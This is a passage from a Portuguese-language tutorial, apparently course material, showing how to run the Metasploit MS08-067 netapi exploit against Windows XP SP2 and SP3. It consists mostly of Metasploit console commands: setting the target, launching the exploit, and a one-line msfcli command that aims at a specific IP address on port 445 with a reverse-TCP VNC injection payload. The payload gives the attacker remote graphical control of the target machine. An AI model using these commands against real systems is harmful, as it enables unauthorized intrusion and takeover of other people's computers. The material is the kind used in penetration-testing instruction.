Neste caso podemos verificar que os sistemas operacionais Windows XP SP2 e SP3 de diversos idiomas são vulneráveis a esse exploit:

msf wins_ms08_067_netapi > set TARGET 56
TARGET -> 56
msf wins_ms08_067_netapi >

Pronto para finalizar:

msf wins_ms08_067_netapi > exploit

Neste momento o exploit entrará em execução no IP alvo informado anteriormente. Se a vulnerabilidade estiver aberta, será apresentada uma resposta informando que a operação obteve sucesso. Esse ataque pode ser automatizado dentro do metasploit com o comando msfcli.

No caso do ataque informado acima, pode-se automatizá-lo com a seguinte linha de comando:

[root]#./msfcli wins_ms08_067_netapi RHOST=200.130.26.34 RPORT=445 PAYLOAD=windows/vncinject/reverse_tcp TARGET=56 E
Copyright © 2014 AIEC.